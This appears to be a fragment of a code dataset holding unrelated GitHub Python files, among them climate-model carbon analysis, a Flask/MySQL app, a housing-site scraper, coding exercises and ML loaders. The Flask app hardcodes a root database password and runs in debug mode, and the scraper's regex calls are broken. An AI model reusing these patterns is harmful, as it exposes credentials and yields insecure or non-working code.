model)\n cLitter_cube = open_netCDF(cLitter_cube)\n cLitter_cube = annual_average(cLitter_cube)\n cLitter_cube = global_total_percentage(cLitter_cube, landfrac=landfraction, latlon_cons=None)\n cLitter_data = cLitter_cube.data\n #\n Cs_data = cSoil_data + cLitter_data\n else:\n Cs_data = cSoil_data.copy()\n \n # NPP\n npp_cube = combine_netCDF_cmip6('/home/rmv203/DATA/CMIP_'+c4mip+'/npp_Lmon_'+model+'_'+c4mip+'*', model)\n npp_cube = open_netCDF(npp_cube)\n npp_cube = annual_average(npp_cube)\n npp_cube = global_total_percentage(npp_cube, landfrac=landfraction, latlon_cons=None)\n npp_data = npp_cube.data*86400.*360. \n \n # tau \n rh_cube = combine_netCDF_cmip6('/home/rmv203/DATA/CMIP_'+c4mip+'/rh_Lmon_'+model+'_'+c4mip+'*', model)\n rh_cube = open_netCDF(rh_cube)\n rh_cube = annual_average(rh_cube)\n rh_cube = global_total_percentage(rh_cube, landfrac=landfraction, latlon_cons=None)\n rh_data = rh_cube.data*86400.*360.\n #\n tau_data = Cs_data/rh_data\n\n # dCs\n deltaCs = np.mean(Cs_data[65:70]) - Cs_data[0] \n \n # dCs,tau\n delta_tau = np.mean(tau_data[65:70]) - tau_data[0]\n deltaCs_tau = delta_tau*npp_data[0]\n \n # dCs,npp\n delta_npp = np.mean(npp_data[65:70]) - npp_data[0]\n deltaCs_npp = delta_npp*tau_data[0]\n \n # dnpp*dtau\n deltadelta = delta_npp*delta_tau\n \n # dNEP\n NEP_t = np.mean(npp_data[65:70]) - np.mean(rh_data[65:70])\n NEP_0 = npp_data[0] - rh_data[0]\n # dCs,NEP\n deltaCs_NEPtau = (NEP_t - NEP_0)*tau_data[0]\n # dCs,tau_NEP\n deltaCs_NEPdeltatau = NEP_0*delta_tau\n # dNEP*dtau\n deltaNEPdeltatau = (NEP_t - NEP_0)*delta_tau\n \n \n #%% Input to arrays\n cmip6_deltaCs[model_i] = deltaCs\n cmip6_deltaCstau[model_i] = deltaCs_tau\n cmip6_deltaCsNPP[model_i] = deltaCs_npp\n cmip6_deltadelta[model_i] = deltadelta\n cmip6_NEPtau[model_i] = deltaCs_NEPtau\n cmip6_NEPdeltatau[model_i] = deltaCs_NEPdeltatau\n cmip6_deltaNEPdeltatau[model_i] = deltaNEPdeltatau\n \n# cmip6_deltaCs_fractional[model_i] = deltaCs / Cs_data[0]\n# cmip6_deltaCstau_fractional[model_i] = deltaCs_tau / Cs_data[0]\n# cmip6_deltaCsNPP_fractional[model_i] = deltaCs_npp / Cs_data[0]\n# cmip6_deltadelta_fractional[model_i] = deltadelta / Cs_data[0]\n# cmip6_NEPtau_fractional[model_i] = deltaCs_NEPtau / Cs_data[0]\n# cmip6_NEPdeltatau_fractional[model_i] = deltaCs_NEPdeltatau / Cs_data[0]\n# cmip6_deltaNEPdeltatau_fractional[model_i] = deltaNEPdeltatau / Cs_data[0]\n\n\n #%% Saving data\n \n np.save('saved_data/cmip6_Cs_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCs.data)\n np.save('saved_data/cmip6_Cstau_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCstau.data)\n np.save('saved_data/cmip6_CsNPP_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCsNPP.data)\n np.save('saved_data/cmip6_deltadelta_'+C4MIP_label+'_2xCO2.npy', cmip6_deltadelta.data)\n np.save('saved_data/cmip6_NEPtau_'+C4MIP_label+'_2xCO2.npy', cmip6_NEPtau.data)\n np.save('saved_data/cmip6_deltaNEPdeltatau_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaNEPdeltatau.data)\n np.save('saved_data/cmip6_NEPdeltatau_'+C4MIP_label+'_2xCO2.npy', cmip6_NEPdeltatau.data)\n\n# np.save('saved_data/cmip6_fractionalCs_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCs_fractional.data)\n# np.save('saved_data/cmip6_fractionalCstau_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCstau_fractional.data)\n# np.save('saved_data/cmip6_fractionalCsNPP_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaCsNPP_fractional.data)\n# np.save('saved_data/cmip6_fractionaldeltadelta_'+C4MIP_label+'_2xCO2.npy', cmip6_deltadelta_fractional.data)\n# np.save('saved_data/cmip6_fractionalNEPtau_'+C4MIP_label+'_2xCO2.npy', cmip6_NEPtau_fractional.data)\n# np.save('saved_data/cmip6_fractionaldeltaNEPdeltatau_'+C4MIP_label+'_2xCO2.npy', cmip6_deltaNEPdeltatau_fractional.data)\n# np.save('saved_data/cmip6_fractionalNEPdeltatau_'+C4MIP_label+'_2xCO2.npy', cmip6_NEPdeltatau_fractional.data)\n \n ","repo_name":"rebeccamayvarney/CMIP6_dCs","sub_path":"quantify_dCs_C4MIP.py","file_name":"quantify_dCs_C4MIP.py","file_ext":"py","file_size_in_byte":8059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26110340719","text":"from pydantic_settings import BaseSettings\n\n\nclass Settings(BaseSettings):\n \"\"\"Настройки телеграмм-бота\"\"\"\n TOKEN: str\n TELEGRAM_LINK: str = \"https://t.me/so1ez\"\n VK_LINK: str = \"https://vk.com/so1ez\"\n GITHUB_LINK: str = \"https://github.com/so1ez\"\n IN_TAGRAM_LINK: str = \"https://instagram.com/lso1ezl\"\n HELLO_MSG: str = \"Привет👋! Я Владимир, мой никнейм в соцсетях - Сóлез (so1ez). \" + \\\n \"Этот бот нужен только для одной цели - предоставить ссылки на мои соцсети!🔗\"\n\n class Config:\n env_file = '.env'\n\n\nSETTINGS = Settings()","repo_name":"so1ez/links-telegram-bot","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3516998280","text":"import pyinputplus as pyip\nimport random\nimport time\n\nnumero_preguntas = 10\nrespuestas_correctas = 0\nfor pregunta in range(numero_preguntas):\n # Elegir dos números aleatorios entre 1 y 10:\n numero1 = random.randint(1, 10)\n numero2 = random.randint(1, 10)\n # Preguntar al usuario:\n pregunta = f\"{numero1} x {numero2} = \"\n try:\n respuesta = pyip.inputStr(pregunta, \n allowRegexes=[f'^{numero1 * numero2}$'], \n blockRegexes=[(\".*\", \"Respuesta inválida\")],\n timeout=8, limit=3)\n except pyip.TimeoutException:\n print(\"¡Tiempo agotado!\")\n break\n except pyip.RetryLimitException:\n print(\"¡Demasiados intentos fallidos!\")\n break\n else:\n print(\"¡Correcto!\")\n respuestas_correctas += 1\n\ntime.sleep(1)\nprint(f\"¡Has acertado {respuestas_correctas} de {numero_preguntas} preguntas!\")\nprint(\"¡Hasta pronto!\")","repo_name":"agustincomolli/Python","sub_path":"Automatiza cosas aburridas/35-prueba_multiplicar.py","file_name":"35-prueba_multiplicar.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8453952652","text":"# Sheldon D'Souza\n# I started out by researching Newtons method for finding roots\n# I coded in the equation for Newton's method which uses the formula:\n# x1 = x0 - f(x0) / f'(x0)\n# I then used a for loop for the iterations to get closer to desired answer\n\n\ndef sqrt():\n\t\n\t# asked for user input as per instructions. We can also ask for an argument \n\t# to be specified while defining the function\n\t# added a while loop to validate whether to validate whether the number is positive.\n\t# If the number is neagtive the program will display a message and repeat the loop asking for the number again.\n\n\tis_positive = True\n\twhile is_positive:\n\t\tpositive_number = float(input('Please enter a positive number: '))\n\t\tif positive_number < 1: # I chose 1 here as I also wanted to exclude 0 from the user input as it will give a 'div by zero' error\n\t\t\t print('The number you have entered is not a positive number')\n\t\telse:\n\t\t\tis_positive = False\t \n\n\t\n\t# The following code will be the first guess for the number. \n\t# This part was a bit tricky but after some research I was able to settle on half the intial number as a good first guess\n\t\n\tpositive_number_guess = (positive_number) / 2\n\t\n\t# The for loop will use the guess as a start and get closer to the answer after each iteration \n\t# (This is part of Newton's method which is meant to get closer to the appoximate root after each iteration)\n\t# I start by iterating through the list using a while loop\n\t# Based on feedback I added code break the for loop if a precision of 4 decimal places is reached\n\t# \tIt was tricky but I did this by adding the result of each iteration to a list and then comparing the last two values\n\t#\t\tof the list (rounded to 4 decimal places) until they were equal, at which point the loop breaks\n\n\tl = [] # defined empty list as per documentation above\n\twhile True: # Decided to use a while loop instead of #\tfor n in range (1,100):\n\t\treal_f = (positive_number_guess ** 2) - positive_number\n\t\tderivative_f = 2 * positive_number_guess\n\t\tpositive_number_guess = positive_number_guess - (real_f / derivative_f)\n\t\tl.append(positive_number_guess) # appends the result of the iteration to a list for use\n\t\tif len(l) > 1: # if statement to avoid a null list error\n\t\t\tif round(l[-1], 4) == round(l[-2], 4): # compares last two values of list (rounded to 4 decimals) for equality\n#\t\t\t\tprint(l) # I have commented out this line, which proves the precision limit on the iteration is working\n\t\t\t\tbreak # breaks out of the loop once the precision level has been reached\n\n\t# printed the desired output\n\t\n\tprint('The squareroot of', positive_number, 'is appoximately', round(positive_number_guess, 4))\n\nsqrt() # calls the function","repo_name":"dssheldon/pands-programs-sds","sub_path":"squareroot.py","file_name":"squareroot.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10191482931","text":"verbo = input(\"Digite o ver a ser conjulgado: \")\ntamanho_do_verbo = len(verbo)\nradical = verbo[: tamanho_do_verbo - 2]\n\npessoa = [\"Eu\", \"Tu\", \"Ele\", \"Nós\", \"Vós\", \"Eles\"]\ntermina_a = [\"o\", \"as\", \"a\", \"amos\", \"ais\", \"am\"]\ntermina_e = [\"o\", \"es\", \"e\", \"emos\", \"eis\", \"em\"]\ntermina_resto = [\"o\", \"es\", \"e\", \"imos\", \"is\", \"em\"]\n\nterminacao = verbo[tamanho_do_verbo - 2]\n\nif terminacao == \"a\":\n for i in range(6):\n print(f\"{pessoa[i]} {radical}{termina_a[i]}\")\nelif terminacao == \"e\":\n for i in range(6):\n print(f\"{pessoa[i]} {radical}{termina_e[i]}\")\nelse:\n for i in range(6):\n print(f\"{pessoa[i]} {radical}{termina_resto[i]}\")\n","repo_name":"Jacksoan-Eufrosino/IntroProg","sub_path":"beecrowd/strings4.py","file_name":"strings4.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"la","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32933087089","text":"# imports\nfrom flask import Flask, render_template, request, redirect\nfrom flaskext.mysql import MySQL\n\n# web application\napp = Flask(__name__)\n\n# connect to db\nmysql = MySQL()\napp.config['MYSQL_DATABASE_USER'] = 'root'\napp.config['MYSQL_DATABASE_PASSWORD'] = 'e4l7l9i7!'\napp.config['MYSQL_DATABASE_DB'] = 'book_industry'\napp.config['MYSQL_DATABASE_HOST'] = 'localhost'\nmysql.init_app(app)\n\n@app.route('/')\ndef index():\n return render_template('/index.html')\n\n@app.route('/add', methods=['POST'])\ndef add():\n # Fetch form data\n publisher = request.form\n name = publisher['name']\n address = publisher['address']\n phone = publisher['phone']\n cur = mysql.get_db().cursor()\n cur.execute(\"INSERT INTO publishers(Name, Address, Phone) VALUES(%s, %s, %s)\",(name,address, phone))\n mysql.get_db().commit()\n return redirect('/publishers')\n\n@app.route('/publishers')\ndef publishers():\n cursor = mysql.get_db().cursor()\n response = cursor.execute(\"SELECT * FROM publishers\")\n # html = '' \n if response > 0:\n publishers = cursor.fetchall()\n return render_template('publishers.html', list=publishers)\n\n# start server\nif __name__ == '__main__':\n app.run(debug=True, port=3000)\n\n # http://localhost:3000","repo_name":"ellidanae/new","sub_path":"hw4/Publishers/add/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5041986342","text":"# 58 同城二手房\nimport requests\nimport re\nfrom multiprocessing import Pool\nfrom lxml import etree\nimport pymongo\n\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0; Waterfox) Gecko/20100101 Firefox/56.2.4',\n}\n\ndef get_info(url):\n res = requests.get(url, headers=headers)\n selector = etree.HTML(res.text)\n house_info_urls = selector.xpath('//div[@class=\"pic\"]/a/@href')\n for house_url_detail in house_info_urls:\n get_info_detail(house_url_detail)\n\ndef get_info_detail(house_url_detail):\n res = requests.get(house_url_detail, headers=headers)\n\n selector = etree.HTML(res.text)\n\n title = re.findall('

(.*?)

')[0].strip()\n price = re.findall('(.*?)')[0].strip()\n unit = re.findall('(.*?) ')[0].strip()\n room = re.findall('

.*?(.*?)')[0].strip()\n area = re.findall('

.*?(.*?)')[0].strip()\n community_1 = selector.xpath('//ul[@class=\"house-basic-item3\"]/li[1]/span[2]/a[1]/text()')[0]\n community_2 = selector.xpath('//ul[@class=\"house-basic-item3\"]/li[1]/span[2]/a[2]/text()')[0]\n community = community_1 + community_2\n\n address_1 = selector.xpath('//ul[@class=\"house-basic-item3\"]/li[2]/span[2]/a[1]/text()')[0]\n address_2 = selector.xpath('//ul[@class=\"house-basic-item3\"]/li[2]/span[2]/a[2]/text()')[0]\n address = address_1 + address_2\n\n info = {\n 'title':title,\n }\n\n\n\ndef get_price(price):\n print(price)\n print()\n\nif __name__ == \"__main__\":\n urls = ['https://lz.58.com/ershoufang/pn{}/'.format(str(i)) for i in range(1, 70)]\n for url in urls:\n get_info(url)","repo_name":"laoniutoushx/Reptile","sub_path":"8.3_58house.py","file_name":"8.3_58house.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71155152749","text":"import pandas as pd\nimport random\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef knn_func(df_pca):\n from sklearn.model_selection import train_test_split\n\n x = df_pca.drop('Class', axis=1).values\n y = df_pca['Class'].values\n\n # Generate a random value for random_state\n random_state = random.randint(0, 999)\n # Split training set and test set\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=random_state, stratify=y)\n\n # Set up the parameter grid for grid search\n param_grid = {'n_neighbors': [3, 5, 7, 9, 11]}\n\n # Create a k-nearest neighbors (KNN) model\n knnModel = KNeighborsClassifier()\n\n # Perform grid search with cross-validation\n grid_search = GridSearchCV(knnModel, param_grid, cv=5)\n grid_search.fit(x_train, y_train)\n\n # Get the best model and its hyperparameters\n hyper_model = grid_search.best_estimator_\n hyper_params = grid_search.best_params_\n\n print(\"Best Hyperparameters:\", hyper_params)\n\n # Predict on the training data\n y_train_predicted = hyper_model.predict(x_train)\n train_accuracy = metrics.accuracy_score(y_train, y_train_predicted)\n print(\"Training Accuracy:\", train_accuracy)\n\n # Predict on the test data\n y_test_predicted = hyper_model.predict(x_test)\n test_accuracy = metrics.accuracy_score(y_test, y_test_predicted)\n print('Testing Accuracy: ', test_accuracy)\n\n # Build the DataFrame of the training set\n df_train = pd.DataFrame(x_train, columns=['PC1', 'PC2', 'PC3'])\n df_train['Class'] = y_train\n df_train['Predict'] = y_train_predicted\n\n # Build the DataFrame of the test set\n df_test = pd.DataFrame(x_test, columns=['PC1', 'PC2', 'PC3'])\n df_test['Class'] = y_test\n df_test['Predict'] = y_test_predicted\n\n # # Plot classification results using scatter matrix\n # plt.scatter(df_test['PC1'], df_test['PC2'], c=df_test['Predict'], marker='o', s=50, label='Predicted')\n # plt.scatter(df_test['PC1'], df_test['PC2'], c=df_test['Class'], marker='x', s=25, label='Actual')\n # plt.xlabel('PC1')\n # plt.ylabel('PC2')\n # plt.legend()\n\n # # Plot matrix of KNN predictions using heatmap\n # confusion_matrix = metrics.confusion_matrix(y_test, y_test_predicted)\n\n # sns.heatmap(confusion_matrix, annot=True, cmap='Blues', fmt='d')\n # plt.xlabel('Predicted')\n # plt.ylabel('Actual')\n # plt.show()\n\n return df_train, df_test","repo_name":"boyonglin/NTU_DBMS","sub_path":"Final Project/Package/fun_kNN.py","file_name":"fun_kNN.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41446743405","text":"import sys\nimport pandas as pd\n\nfrom PyQt5.QtWidgets import QWidget, QTextEdit, QVBoxLayout\nfrom PyQt5.QtCore import pyqtSignal\n\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\n\nclass MessageBox(QWidget):\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.message = ''\n\n\t\tself.te = QTextEdit()\n\t\tself.te.setPlaceholderText('This meesage box will display important messages.')\n\t\tself.te.setReadOnly(True)\n\n\t\tself.setFixedHeight(200)\n\t\tself.setFixedWidth(250)\n\n\t\tlayout = QVBoxLayout()\n\t\tlayout.addWidget(self.te)\n\t\tlayout.setAlignment(QtCore.Qt.AlignCenter)\n\n\t\tself.setLayout(layout)\n\n\tdef on_sent_message(self, sent_message, hexColor='#000000'):\n\t\t#self.message += sent_message\n\t\tprefix = f''\n\t\tsuffix = f''\n\t\tmessage = prefix + f'{sent_message}' + suffix\n\t\tself.te.setText(message)","repo_name":"rongmon/rbcodes","sub_path":"GUIs/zgui/message_box.py","file_name":"message_box.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"4713964887","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n rows = [''] * numRows\n direction = 1\n current = 0\n \n if numRows == 1: return s\n\n for char in s:\n rows[current] += char\n if current == 0: direction = 1\n if current == numRows - 1: direction = -1\n\n current += direction\n\n output = ''\n for row in rows:\n output += row\n\n return output","repo_name":"yj199522/LeetCode","sub_path":"6-zigzag-conversion/6-zigzag-conversion.py","file_name":"6-zigzag-conversion.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70636408746","text":"import bblfsh_sonar_checks.utils as utils\n\nimport bblfsh\n\ndef check(uast):\n findings = []\n name2class = {}\n\n cl_nodes = bblfsh.filter(uast, \"//*[@roleDeclaration and @roleType]\")\n\n for cl in cl_nodes:\n jc = utils.JClass(cl)\n name2class[jc.name] = jc\n\n for clname, cl in name2class.items():\n if not cl.parent:\n continue\n\n methods = cl.methods\n for method in methods:\n par_class = name2class.get(cl.parent)\n if not par_class:\n continue\n\n for parmethod in par_class.methods:\n if parmethod.name != method.name and \\\n parmethod.name.lower() == method.name.lower():\n\n findings.append({\"msg\": \"Methods with same name but different casing in subclass: \"\n \"{}.{} and {}.{}\".format(clname, method.name, cl.parent, parmethod.name)})\n\n return findings\n\nif __name__ == '__main__': utils.run_default_fixture(__file__, check)\n","repo_name":"bblfsh/sonar-checks","sub_path":"bblfsh_sonar_checks/checks/java/RSPEC-1845.py","file_name":"RSPEC-1845.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"42076924330","text":"from typing import FrozenSet\r\n\r\nfrom ksc.expr import Expr, Var, Let, Lam, Const\r\nfrom ksc.visitors import ExprVisitor, ExprTransformer\r\nfrom ksc.parse_ks import parse_expr_string\r\n\r\n# This seems to cover all the cases.\r\nexpr = parse_expr_string(\r\n \"(let (a (if p (add b c) (neg b))) (assert (gt a 0) (build a (lam (i : Integer) i))))\"\r\n)\r\n\r\n\r\ndef test_visitor():\r\n class CountConsts(ExprVisitor):\r\n def __init__(self):\r\n super().__init__(False)\r\n self._count = 0\r\n\r\n def count(self, e: Expr):\r\n self.visit(e)\r\n return self._count\r\n\r\n def visit_const(self, c: Const):\r\n self._count += 1\r\n\r\n assert CountConsts().count(expr) == 1\r\n assert (\r\n CountConsts().count(\r\n parse_expr_string(\r\n \"(if (gt p 0) x (index a (build 10 (lam (i : Integer) (add i 2)))))\"\r\n )\r\n )\r\n == 3\r\n )\r\n\r\n\r\ndef test_expr_transformer():\r\n assert ExprTransformer().visit(expr) == expr\r\n\r\n # A simple, non-semantic-preserving, transformation - this does not rename binders.\r\n class VarRenamer(ExprTransformer):\r\n def visit_var(self, v: Var) -> Expr:\r\n return Var(v.name + \"2\")\r\n\r\n # Thus, check ExprTransformer traverses to the leaves.\r\n assert VarRenamer().visit(expr) == parse_expr_string(\r\n \"(let (a (if p2 (add b2 c2) (neg b2))) (assert (gt a2 0) (build a2 (lam (i : Integer) i2))))\"\r\n )\r\n\r\n\r\ndef test_expr_transformer_arg_passing():\r\n class UnboundVarRenamer(ExprTransformer):\r\n def visit_var(self, v: Var, bound_vars: FrozenSet[str]) -> Expr:\r\n return v if v.name in bound_vars else Var(v.name + \"_2\")\r\n\r\n def visit_let(self, l: Let, bound_vars: FrozenSet[str]) -> Expr:\r\n bound_here = (\r\n [l.vars.name] if isinstance(l.vars, Var) else [v.name for v in l.vars]\r\n )\r\n return Let(\r\n l.vars,\r\n self.visit(l.rhs, bound_vars),\r\n self.visit(l.body, bound_vars.union(bound_here)),\r\n )\r\n\r\n def visit_lam(self, l: Lam, bound_vars: FrozenSet[str]) -> Expr:\r\n return Lam(l.arg, self.visit(l.body, bound_vars.union([l.arg.name])))\r\n\r\n assert UnboundVarRenamer().visit(expr, frozenset()) == parse_expr_string(\r\n \"(let (a (if p_2 (add b_2 c_2) (neg b_2))) (assert (gt a 0) (build a (lam (i : Integer) i))))\"\r\n )\r\n","repo_name":"microsoft/knossos-ksc","sub_path":"test/python/test_visitors.py","file_name":"test_visitors.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"36058463652","text":"class User: \n def __init__(self, user_id: str, username: str) -> None:\n self.id = user_id\n self.username = username\n self.followers = 0\n self.following = 0\n \n def follow(self, user) -> None:\n user.followers += 1\n self.following += 1 \n \n\nuser_1 = User('1', 'Anna')\nuser_2 = User('2', 'Clark')\nuser_3 = User('3', 'Jack')\n\nuser_1.follow(user_2)\nuser_1.follow(user_3)\nprint(user_1.followers) \nprint(user_1.following) ","repo_name":"Anveks/Python-Basics","sub_path":"OOP/random/userClass.py","file_name":"userClass.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12303331829","text":"# -*- coding: utf-8 -*-\n# 43\n\nfilepath = 'neko_cabocha.txt'\nimport p41\n\ndef display_nv_relationship(text):\n for chunks in text:\n for i in range(len(chunks)):\n if '名詞' in chunks[i].get_pos():\n if '動詞' in chunks[chunks[i].dst].get_pos():\n print (chunks[i].get_text()+'\\t'+chunks[chunks[i].dst].get_text()).replace('、','').replace('。','')\n\n# display_nv_relationship(p41.create_Chunks(filepath))\n\n","repo_name":"kojino/nlp100","sub_path":"ch5/p43.py","file_name":"p43.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4492163633","text":"\n\nfrom ibvpy.mats.mats2D.mats2D_elastic.mats2D_elastic import MATS2DElastic\nfrom ibvpy.fets.fets2D.fets2D4q import FETS2D4Q\nfrom ibvpy.fets.fets2D.fets2D4q8u import FETS2D4Q8U\nfrom ibvpy.api import\\\n BCDofGroup, TStepper as TS, TLoop, TLine, RTDofGraph\nfrom ibvpy.rtrace.rt_domain_list_field import RTraceDomainListField\nfrom ibvpy.mesh.fe_grid import FEGrid\nfrom ibvpy.mesh.fe_refinement_grid import FERefinementGrid\nfrom ibvpy.mesh.fe_domain import FEDomain\n\nif __name__ == '__main__':\n\n fets_eval_4u = FETS2D4Q(mats_eval = MATS2DElastic())\n fets_eval_8u = FETS2D4Q8U(mats_eval = MATS2DElastic())\n \n fe_domain = FEDomain()\n\n fe_rgrid1 = FERefinementGrid( name = 'fe_rgrid1', fets_eval = fets_eval_4u, domain = fe_domain )\n\n fe_grid1 = FEGrid( name = 'fe_grid1', coord_max = (2.,6.,0.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid1 ) \n\n fe_grid2 = FEGrid( name = 'fe_grid2', coord_min = (2., 6, 0.),\n coord_max = (10, 15, 0.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid1 ) \n \n fe_rgrid2 = FERefinementGrid( name = 'fe_rgrid2', fets_eval = fets_eval_4u, domain = fe_domain )\n \n fe_grid3 = FEGrid( name = 'fe_grid3', coord_min = (0, 0, 1.),\n coord_max = (2., 6.,1.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid2 ) \n\n fe_grid4 = FEGrid( name = 'fe_grid4', coord_min = (2., 6, 1.),\n coord_max = (10, 15, 1.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid2 ) \n\n fe_rgrid3 = FERefinementGrid( name = 'fe_rgrid3', fets_eval = fets_eval_4u, domain = fe_domain )\n \n fe_grid5 = FEGrid( name = 'fe_grid5', coord_min = (0, 0, 2.),\n coord_max = (2., 6.,2.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid3 ) \n\n fe_grid6 = FEGrid( name = 'fe_grid6', coord_min = (2., 6, 2.),\n coord_max = (10, 15, 2.), \n shape = (1,3),\n fets_eval = fets_eval_4u,\n level = fe_rgrid3 ) \n\n ts = TS( dof_resultants = True,\n sdomain = fe_domain,\n bcond_list = [BCDofGroup(var='f', value = 1., dims = [0],\n get_dof_method = fe_grid1.get_top_dofs ),\n BCDofGroup(var='u', value = 0., dims = [0,1],\n get_dof_method = fe_grid1.get_bottom_dofs ),\n ],\n rtrace_list = [ RTDofGraph(name = 'Fi,right over u_right (iteration)' ,\n var_y = 'F_int', idx_y = 0,\n var_x = 'U_k', idx_x = 1),\n RTraceDomainListField(name = 'Stress',\n var = 'sig_app', idx = 0, warp = False ),\n# RTraceDomainField(name = 'Displacement' ,\n# var = 'u', idx = 0),\n# RTraceDomainField(name = 'N0' ,\n# var = 'N_mtx', idx = 0,\n# record_on = 'update')\n ]\n )\n \n \n # Add the time-loop control\n tloop = TLoop( tstepper = ts,\n tline = TLine( min = 0.0, step = 1, max = 1.0 ))\n \n print(tloop.setup())\n \n from ibvpy.plugins.ibvpy_app import IBVPyApp\n ibvpy_app = IBVPyApp( ibv_resource = tloop )\n ibvpy_app.main()\n ","repo_name":"simvisage/bmcs","sub_path":"ibvpy/mesh/examples/domain_manipulations.py","file_name":"domain_manipulations.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72353685868","text":"# Using break and continue\n\n# break: used to terminate/exit the loop\n# continue: used to end an iteration and move onto the next iteration\n\n# Find something in an array\n\nneedle = \"apple\"\nhaystack = [\"banana\", \"orange\", \"watermelon\", \"apple\", \"melon\"]\n\nfor h in haystack:\n if needle == h:\n print(h)\n break\n","repo_name":"madqueendany/python-tutorials","sub_path":"14-Nov/break-continue.py","file_name":"break-continue.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70172119787","text":"def fixedXor(ip1, ip2):\n if(len(ip1) != len(ip2)):\n print(\"Error: length of inputs not same\")\n return null\n \n result = [0]*len(ip1)\n\n for i in range(len(ip1)):\n result[i] = ip1[i] ^ ip2[i]\n\n result = bytes(result)\n return result\n\n\ndef main():\n ip1 = input(\"First ip: \")\n ip2 = input(\"Second ip: \")\n ip1 = bytes.fromhex(ip1)\n ip2 = bytes.fromhex(ip2)\n result = fixedXor(ip1, ip2)\n print(result)\n\nif __name__ == \"__main__\":\n main() \n","repo_name":"D-setia/CryptoPals","sub_path":"set1/chall_2/fixedXor.py","file_name":"fixedXor.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9847270438","text":"# WRITE YOUR CODE HERE\ndef find_key(d, v):\n keys = list(d.keys())\n values = list(d.values())\n index = values.index(v)\n return keys[index]\n\n\n# test code below\nif __name__ == \"__main__\":\n example_dict = {\n 1 : ['red', 'blue', 'green'],\n 'Josh Jung' : (9, 10),\n 3 : {0 : 0},\n 9000 : 'impale mat a'\n}\n\n#key = find_key(example_dict, (0, 0))\n#print(key)\n\n","repo_name":"jesusrodriguezz/project1","sub_path":"code/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17477985457","text":"import pandas as pd\nimport json\nimport numpy as np\nnp.random.seed(42)\n\ndef sent_16():\n\ttop = 800000\n\tdf_pos = pd.read_csv('training.1600000.processed.noemoticon.csv', encoding='utf-8', header=None, usecols=[0,5]).head(top)\n\tdf_neg = pd.read_csv('training.1600000.processed.noemoticon.csv', encoding='utf-8', header=None, usecols=[0,5]).tail(top)\n\tdatabase = df_pos[5].tolist() + df_neg[5].tolist()\n\tlabels = df_pos[0].tolist() + df_neg[0].tolist()\n\tfor n, i in enumerate(labels):\n\t\tif i == 4:\n\t\t\tlabels[n] = 1\n\treturn database, labels\n\ndef sent_16_translate():\n\tdf = pd.read_csv('translate.csv', header=None, usecols=[0,4])\n\tdf_neg = df[df[4] == '0']\n\tdf_pos = df[df[4] == '1']\n\n\tdatabase = df_pos[0].tolist() + df_neg[0].tolist()\n\tlabels = 